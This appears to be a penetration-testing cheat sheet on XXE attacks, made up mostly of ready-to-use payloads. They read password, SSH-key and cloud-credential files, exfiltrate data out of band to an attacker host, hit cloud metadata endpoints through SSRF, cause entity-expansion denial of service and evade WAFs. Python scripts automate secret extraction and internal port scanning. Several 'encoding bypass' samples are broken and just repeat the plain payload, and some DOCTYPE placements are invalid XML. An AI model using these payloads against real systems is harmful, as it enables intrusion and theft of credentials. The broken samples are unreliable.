XML External Entity (XXE)
XML External Entity (XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It can lead to disclosure of confidential data, denial of service, server-side request forgery (SSRF), and other system impacts.
How It Works
XXE vulnerabilities arise when an XML parser processes external entity references within XML input. For example:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>
If the parser has external entities enabled, it will read and include the contents of /etc/passwd
in the XML processing, potentially exposing it to the attacker.
Detection
Manual Testing
Basic XXE Tests
Testing for basic XXE vulnerabilities:
# Step 1: Identify XML input
# Look for Content-Type: application/xml
# Look for XML in POST body
# Check file uploads accepting XML formats
# Step 2: Test with basic external entity
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<data>&xxe;</data>
</root>
# Step 3: Check response
# - File contents visible: Direct XXE
# - Error message with path: Information disclosure
# - No response but delay: Blind XXE possible
# Step 4: Test with HTTP callback
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://your-server.com/xxe-test">
]>
<root>
<data>&xxe;</data>
</root>
# Check your server for incoming request
Parameter Entity Tests
Testing with parameter entities:
# Basic parameter entity
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
%xxe;
]>
<root></root>
# External DTD with parameter entity
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<root></root>
# evil.dtd content:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfil;
File Upload XXE Tests
Testing XXE through file uploads:
# SVG file with XXE
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg width="500" height="500" xmlns="http://www.w3.org/2000/svg">
<text x="0" y="20">&xxe;</text>
</svg>
# DOCX file with XXE
# Unzip DOCX file
# Edit word/document.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<w:document>
<w:body>
<w:p>
<w:r>
<w:t>&xxe;</w:t>
</w:r>
</w:p>
</w:body>
</w:document>
# XLSX file with XXE
# Edit xl/workbook.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<workbook>&xxe;</workbook>
SOAP XXE Tests
Testing XXE in SOAP requests:
# Basic SOAP XXE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<getUser>
<username>&xxe;</username>
</getUser>
</soap:Body>
</soap:Envelope>
# SOAP with external DTD
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<getData/>
</soap:Body>
</soap:Envelope>
Blind XXE Tests
Testing when output is not reflected:
# Out-of-band XXE with DNS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<root></root>
# evil.dtd:
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://%file;.attacker.com/'>">
%all;
%send;
# Out-of-band with HTTP
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<root></root>
# evil.dtd:
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://attacker.com/?data=%file;'>">
%all;
%send;
Automated Discovery
Using Burp Suite
# Step 1: Identify XML endpoints
# Filter Burp history for Content-Type: application/xml
# Or look for XML in request bodies
# Step 2: Send to Repeater
# Test with basic XXE payload
# Step 3: Use Burp Collaborator
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN">
]>
# Step 4: Use Burp Extensions
# Install: Content Type Converter
# Install: Freddy, Deserialization Bug Finder
Using XXEinjector
# Basic file extraction
xxeinjector --host=target.com --path=/upload --file=request.txt \
--oob=http --phpfilter
# Directory listing
xxeinjector --host=target.com --path=/api --file=request.txt \
--oob=http --enumports
# Advanced options
xxeinjector --host=target.com --path=/endpoint \
--file=request.txt \
--oob=http \
--phpfilter \
--direct=PARAMETER \
--xslt
Using Nuclei
# Run XXE templates
nuclei -u https://target.com -t xxe/
# Specific XXE checks
nuclei -u https://target.com -t xxe/blind-xxe.yaml
# With custom headers
nuclei -u https://target.com -t xxe/ -H "Authorization: Bearer TOKEN"
Attack Vectors
Local File Disclosure
Reading local files through XXE:
# Linux files
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
# Common Linux targets
file:///etc/passwd # User accounts
file:///etc/shadow # Password hashes (if accessible)
file:///etc/hosts # Host file
file:///etc/hostname # System hostname
file:///proc/self/environ # Environment variables
file:///proc/self/cmdline # Process command line
file:///proc/net/tcp # Network connections
file:///proc/net/fib_trie # Network routes
file:///root/.ssh/id_rsa # SSH private key
file:///root/.bash_history # Command history
# Windows files
file:///c:/windows/win.ini
file:///c:/windows/system32/drivers/etc/hosts
file:///c:/boot.ini
file:///c:/windows/system32/config/sam
# Application files
file:///var/www/html/config.php
file:///var/www/.env
file:///home/user/.aws/credentials
PHP Wrappers Exploitation
Using PHP wrappers for advanced file access:
# Base64 encode file content (bypasses special chars)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<root>&xxe;</root>
# Read PHP source code
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=config.php">
]>
<root>&xxe;</root>
# Execute PHP code (if enabled)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-decode/resource=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=">
]>
<root>&xxe;</root>
# Read POST data
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://input">
]>
<root>&xxe;</root>
SSRF via XXE
Using XXE to perform SSRF attacks:
# Internal network scanning
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://192.168.1.1/">
]>
<root>&xxe;</root>
# AWS metadata
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root>&xxe;</root>
# Internal services
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://localhost:8080/admin">
]>
<root>&xxe;</root>
# Gopher protocol for service exploitation
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "gopher://127.0.0.1:6379/_INFO">
]>
<root>&xxe;</root>
Denial of Service
DoS attacks through XXE:
# Billion Laughs Attack (Exponential Entity Expansion)
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
# External entity with large file
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///dev/random">
]>
<root>&xxe;</root>
# Recursive entity definition
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe "&xxe;">
]>
<root>&xxe;</root>
Blind XXE with OOB Data Exfiltration
Exfiltrating data when no output is visible:
# Step 1: Injection payload
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<root></root>
# Step 2: evil.dtd on attacker server
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://attacker.com/collect?data=%file;'>">
%all;
%send;
# Step 3: With base64 encoding (for special characters)
# Injection:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<root></root>
# evil.dtd:
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://attacker.com/collect?data=%file;'>">
%all;
%send;
XInclude Attacks
Using XInclude when DOCTYPE is not controllable:
# Basic XInclude
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</root>
# XInclude with URL
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="http://attacker.com/evil.xml"/>
</root>
# XInclude in SOAP
<soap:Body xmlns:xi="http://www.w3.org/2001/XInclude">
<getUser>
<xi:include parse="text" href="file:///etc/passwd"/>
</getUser>
</soap:Body>
Bypass Techniques
DTD Restrictions Bypass
Bypassing DTD blocking:
# Using XInclude (no DOCTYPE needed)
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</root>
# XLIFF file format
<xliff version="1.2" xmlns="urn:oasis:names:tc:xliff:document:1.2">
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<file>
<body>
<trans-unit>
<source>&xxe;</source>
</trans-unit>
</body>
</file>
</xliff>
# SVG with foreign object
<svg xmlns="http://www.w3.org/2000/svg">
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<text>&xxe;</text>
</svg>
Entity Reference Bypass
Alternative entity syntax:
# Hexadecimal entity encoding
<!ENTITY xxe "file:///etc/passwd">
# Decimal entity encoding
<!ENTITY xxe "file:///etc/passwd">
# Using CDATA
<!ENTITY xxe "<![CDATA[file:///etc/passwd]]>">
# Character references
<!ENTITY % file "file:///etc/passwd">
Protocol Bypass
Using alternative protocols:
# When file:// is blocked, try others
<!ENTITY xxe SYSTEM "http://localhost/file">
<!ENTITY xxe SYSTEM "https://localhost/file">
<!ENTITY xxe SYSTEM "ftp://localhost/file">
<!ENTITY xxe SYSTEM "php://filter/resource=/etc/passwd">
<!ENTITY xxe SYSTEM "expect://ls">
<!ENTITY xxe SYSTEM "data://text/plain;base64,SGVsbG8=">
# Gopher for raw TCP
<!ENTITY xxe SYSTEM "gopher://127.0.0.1:6379/_INFO">
# Dictionary protocol
<!ENTITY xxe SYSTEM "dict://127.0.0.1:11211/stats">
Encoding Bypass
Different encoding methods:
# UTF-16 encoding
<?xml version="1.0" encoding="UTF-16"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
# UTF-7 encoding (rare but possible)
<?xml version="1.0" encoding="UTF-7"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
# HTML entities in URLs
<!ENTITY xxe SYSTEM "file:///etc/passwd">
# URL encoding
<!ENTITY xxe SYSTEM "file%3a%2f%2f%2fetc%2fpasswd">
Content-Type Manipulation
Changing content-type to trigger XML parsing:
# Original request (JSON)
POST /api/user HTTP/1.1
Content-Type: application/json
{"username":"test"}
# Change to XML
POST /api/user HTTP/1.1
Content-Type: application/xml
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<user>
<username>&xxe;</username>
</user>
# Try variations
Content-Type: text/xml
Content-Type: application/x-xml
Content-Type: application/xhtml+xml
WAF Bypass
Evading WAF detection:
# Case variation
<!DOCTYPE foo [<!EnTiTy xxe SYSTEM "file:///etc/passwd">]>
<!doctype foo [<!entity xxe SYSTEM "file:///etc/passwd">]>
# Whitespace and newlines
<!DOCTYPE foo [
<!ENTITY
xxe
SYSTEM
"file:///etc/passwd"
>
]>
# Comments
<!DOCTYPE foo [<!--comment--><!ENTITY xxe SYSTEM "file:///etc/passwd"><!--comment-->]>
# Mixed encoding
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
# Multiple DOCTYPE declarations
<!DOCTYPE foo>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
Post-Exploitation
Sensitive File Extraction
Systematically extracting valuable files:
# Python script for automated file extraction
import requests
import base64
files_to_read = [
"/etc/passwd",
"/etc/shadow",
"/etc/hosts",
"/root/.ssh/id_rsa",
"/var/www/html/config.php",
"/var/www/.env",
"/proc/self/environ",
]
url = "https://target.com/api/xml"
for file_path in files_to_read:
# Using PHP filter for base64 encoding
payload = f'''<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource={file_path}">
]>
<root>&xxe;</root>'''
response = requests.post(url, data=payload, headers={
'Content-Type': 'application/xml'
})
if response.status_code == 200:
try:
# Extract base64 content
content = extract_content(response.text)
decoded = base64.b64decode(content).decode()
print(f"[+] {file_path}:")
print(decoded)
print("-" * 50)
except:
print(f"[-] Failed to extract: {file_path}")
Cloud Credentials via XXE
Extracting cloud metadata:
# AWS credentials
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root>&xxe;</root>
# Then extract specific role
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE-NAME]">
]>
<root>&xxe;</root>
# Azure credentials
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/">
]>
<root>&xxe;</root>
# GCP credentials (requires header, may not work)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token">
]>
<root>&xxe;</root>
Internal Port Scanning
Scanning internal networks:
# Port scanning via XXE
import requests
target_url = "https://vulnerable.com/api/xml"
internal_ip = "192.168.1.100"
ports = [21, 22, 23, 25, 80, 443, 3306, 5432, 6379, 8080]
for port in ports:
payload = f'''<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://{internal_ip}:{port}/">
]>
<root>&xxe;</root>'''
try:
response = requests.post(target_url, data=payload, timeout=5)
if "Connection refused" not in response.text:
print(f"[+] Port {port} appears open")
except requests.Timeout:
print(f"[*] Port {port} timeout (possibly filtered)")
except:
pass
Code Execution via XXE
Achieving RCE in specific scenarios:
# Expect protocol (if expect extension enabled in PHP)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "expect://ls">
]>
<root>&xxe;</root>
# Execute command
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "expect://whoami">
]>
<root>&xxe;</root>
# Via file write + inclusion (PHP)
# Step 1: Write shell via FTP (if FTP wrapper enabled)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "ftp://user:pass@localhost/shell.php">
]>
<root>&xxe;</root>
# Step 2: Include written file
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/resource=/tmp/shell.php">
]>
<root>&xxe;</root>
Common Tools
Tool | Description | Primary Use Case |
---|---|---|
XXEinjector | XXE exploitation tool | Automated XXE testing |
Burp Suite | Web vulnerability scanner | Manual XXE testing |
OXML_XXE | XXE in Office documents | Document-based XXE |
xmllint | XML parser | Local testing |
XXExploiter | XXE exploitation framework | Advanced XXE exploitation |
Nuclei | Vulnerability scanner | XXE detection |